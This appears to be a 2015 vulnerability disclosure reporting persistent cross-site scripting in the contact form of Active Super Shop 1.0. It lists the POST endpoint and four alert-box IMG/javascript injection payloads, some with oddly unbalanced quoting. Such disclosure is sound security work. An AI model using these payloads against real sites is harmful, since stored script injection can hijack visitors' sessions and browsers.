Home / os / winmobile

Active Super Shop 1.0 Cross Site Scripting

Posted on 20 July 2015

# Exploit Title:Active Super Shop Persistent XSS
# Date: Fri July 17 2015
# Exploit Author: Angelo Ruwantha
# Vendor Homepage: http://activeitzone.com/
# Version:1.0
# Tested on: archlinux

Vulnerability(persistent XSS)
========================
contact form fields vulnerable to persistent xss.
[+]Method:POST

1.http://URL/index.php/home/contact/ (;persistent XSS)

name=<IMG SRC="javascript:alert('HEY;)');
&email=<IMG SRC="javascript:alert('another script;)');
&subject=<IMG SRC="javascript:alert('every parameter;)');
&message=<IMG SRC="javascript:alert('injectable;)');

 

TOP